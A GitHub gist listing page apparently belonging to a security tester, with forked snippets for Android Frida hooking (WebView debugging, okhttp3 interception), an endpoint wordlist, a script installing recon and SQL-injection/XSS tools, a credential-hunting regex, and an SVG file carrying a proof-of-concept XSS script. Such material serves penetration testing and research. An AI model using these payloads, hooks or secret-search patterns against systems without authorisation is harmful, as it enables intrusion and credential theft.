Skip to content

Instantly share code, notes, and snippets.

View michaellcader's full-sized avatar
🏠
Working from home

MichaellCader michaellcader

🏠
Working from home
View GitHub Profile
@michaellcader
michaellcader / cordova-enable-webview-debug.js
Created January 28, 2025 17:13 — forked from n1sh1th/cordova-enable-webview-debug.js
Cordova - Enable Webview Debugging
// Usage : frida -U -f bundle_id -l cordova-enable-webview-debug.js --no-pause
Java.perform(function() {
var Webview = Java.use("android.webkit.WebView")
Webview.loadUrl.overload("java.lang.String").implementation = function(url) {
console.log("[+]Loading URL from", url);
this.setWebContentsDebuggingEnabled(true);
this.loadUrl.overload("java.lang.String").call(this, url);
}
});
@michaellcader
michaellcader / chrome-inspect.md
Created January 20, 2025 06:47 — forked from Mufanc/chrome-inspect.md
优化 chrome://inspect 调试
  • 打开 chrome://flags,启用:

image

  • manifest.json
{
    "manifest_version": 2,
    "name": "Refine Inspector",
@michaellcader
michaellcader / frida-okhttp3-hook.js
Created July 22, 2024 08:46 — forked from eyJhb/frida-okhttp3-hook.js
Android Frida Reverse Engineer Hook for okhttp3 requests/response
function hook_okhttp3() {
Java.perform(function() {
var ByteString = Java.use("com.android.okhttp.okio.ByteString");
var Buffer = Java.use('okio.Buffer'); var Interceptor = Java.use("okhttp3.Interceptor");
var MyInterceptor = Java.registerClass({
name: "okhttp3.MyInterceptor",
implements: [Interceptor],
methods: {
intercept: function(chain) {
var request = chain.request();
/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents
git clone https://github.com/projectdiscovery/fuzzing-templates.git 2>/dev/null
git clone https://github.com/ExpLangcn/NucleiTP.git 2>/dev/null
wget https://github.com/projectdiscovery/pdtm/releases/download/v0.0.9/pdtm_0.0.9_linux_amd64.zip 2>/dev/null
wget https://github.com/tomnomnom/unfurl/releases/download/v0.4.3/unfurl-linux-amd64-0.4.3.tgz 2>/dev/null
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2>/dev/null
wget https://github.com/hahwul/dalfox/releases/download/v2.9.2/dalfox_2.9.2_linux_amd64.tar.gz 2>/dev/null
wget https://github.com/tomnomnom/waybackurls/releases/download/v0.1.0/waybackurls-linux-amd64-0.1.0.tgz 2>/dev/null
git clone https://github.com/michaellcader/ghauri.git 2>/dev/null;cd ghauri;python -m pip install -e . 2>/dev/null
wget https://github.com/tomnomnom/qsreplace/releases/download/v0.0.3/qsreplace-linux-amd64-0.0.3.tgz;tar zxvf qsreplace-linux-amd64-0.0.3.tgz 2>/dev/null
tar zxvf waybackurls-linux-amd64-0.1.0.tgz 2>/dev/null
@michaellcader
michaellcader / .Cloud.md
Created February 5, 2024 08:20 — forked from imba-tjd/.Cloud.md
☁️ 一些免费的云资源

IaaS指提供系统(可以自己选)或者储存空间之类的硬件,软件要自己手动装;PaaS提供语言环境和框架(可以自己选);SaaS只能使用开发好的软件(卖软件本身);BaaS一般类似于非关系数据库,但各家不通用,有时还有一些其它东西。

其他人的集合

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
@michaellcader
michaellcader / xss-image.svg
Created August 17, 2023 12:33 — forked from rudSarkar/xss-image.svg
SVG Image XSS File
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@michaellcader
michaellcader / entitle.sh
Created July 26, 2023 08:08 — forked from D00MFist/entitle.sh
Entitlement checker
for file in /Applications/*
do
echo "--------------" >>results.out
echo "$file" >>results.out
codesign -d --entitlements - "$file" >> results.out
done
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k